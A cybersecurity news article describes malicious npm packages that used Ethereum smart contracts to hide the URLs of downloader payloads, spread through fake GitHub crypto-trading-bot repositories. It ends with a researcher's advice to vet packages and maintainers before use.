Cybersecurity researchers have recently uncovered two malicious packages on the npm registry that leverage smart contracts on the Ethereum blockchain to perform harmful actions on compromised systems. This discovery highlights an alarming trend in which threat actors continually seek innovative methods to distribute malware while avoiding detection.
According to ReversingLabs researcher Lucija Valentić, the malicious packages were designed to hide harmful commands that install downloader malware on affected systems. Both packages were uploaded to the npm registry in July 2025 and have since been removed.
ReversingLabs described these packages as being part of a more extensive and organized campaign that impacts both npm and GitHub, targeting unsuspecting developers who inadvertently download and execute them. While the packages themselves do not attempt to disguise their malicious nature, the associated GitHub projects have been crafted to appear genuine and credible.
The worrisome behavior emerges once these packages are utilized or included in other projects, leading to the initiation of a next-stage payload from an attacker-controlled server. What sets these packages apart from traditional malware downloaders is their innovative use of Ethereum smart contracts to stage the URLs from which the payloads are hosted, a method reminiscent of the EtherHiding technique. This strategic shift reflects the evolving tactics used by cybercriminals to evade detection.
Further investigation revealed that the malicious packages are linked to a network of GitHub repositories that falsely claim to be a solana-trading-bot-v2, which purports to use “real-time on-chain data to execute trades automatically.” However, the GitHub account associated with this repository has since been taken down.
Experts believe that these accounts are part of a distribution-as-a-service (DaaS) scheme known as Stargazers Ghost Network. This refers to a cluster of fake GitHub accounts that are designed to enhance the appearances of malicious repositories through various tactics such as starring, forking, and subscribing.
Among the many repositories involved in disseminating the npm packages are those related to cryptocurrency trading, including ethereum-mev-bot-v2, arbitrage-bot, and hyperliquid-trading-bot. The naming conventions of these GitHub repositories indicate that the primary targets of this campaign are developers and users within the cryptocurrency space, relying on a combination of social engineering and deception.
Valentić emphasized the need for developers to vigilantly evaluate libraries before integrating them into their projects. This involves not only examining the packages themselves but also looking into the reputations and histories of their maintainers. The focus should extend beyond superficial metrics such as the number of downloads or commits to determine whether a package and its developers authentically represent what they claim.
